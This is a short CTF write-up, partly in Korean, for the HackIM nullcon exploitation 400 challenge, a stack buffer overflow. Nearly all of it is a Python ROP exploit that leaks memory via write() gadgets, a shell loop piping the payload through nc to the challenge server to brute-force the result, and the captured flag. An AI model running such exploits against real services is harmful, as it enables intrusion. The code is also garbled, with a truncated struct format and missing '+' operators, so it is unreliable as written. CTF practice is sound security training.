HackIM nullcon exploitation 400 write-up [exploit]

주제 : simple stack based buffer overflow

binary :

chall_heap

import time

import struct

p = lambda x : struct.pack("

write = 0x08048440

ppppr = 0x080486a6

pppr = ppppr 1

ppr = pppr 1

pr = ppr 1

r = pr 1

payload = "A" * 0x64

for i in range(0x09371008, 0x094ed008, 0x1000):

payload = p(write) # ret here

payload = p(pppr)

payload = p(1)

payload = p(i)

payload = p(0x1000)

f = open("a.txt", "wb")

f.write(payload)

f.close()

"""

root@ubuntu:/home/sweetchip/Desktop/cyber/ncon# execstack ./chall_heap

- ./chall_heap

root@ubuntu:/home/sweetchip/Desktop/cyber/ncon# while [ 1 ] ; do (cat a.txt) | nc 23.23.190.205 8976 ; done > nc.txt

^C

root@ubuntu:/home/sweetchip/Desktop/cyber/ncon# cat nc.txt | sort | uniq -c

1 ?Good Enough? Pwn Me!

1 96d1c4d1f47b666928a37f7dd6a4383e

77 Good Enough? Pwn Me!

key : 96d1c4d1f47b666928a37f7dd6a4383e

"""

위 코드로 100번정도 brute-force를 시도하면 한번정도는 키가 줄력된다

으아아ㅏ..

flag : 96d1c4d1f47b666928a37f7dd6a4383e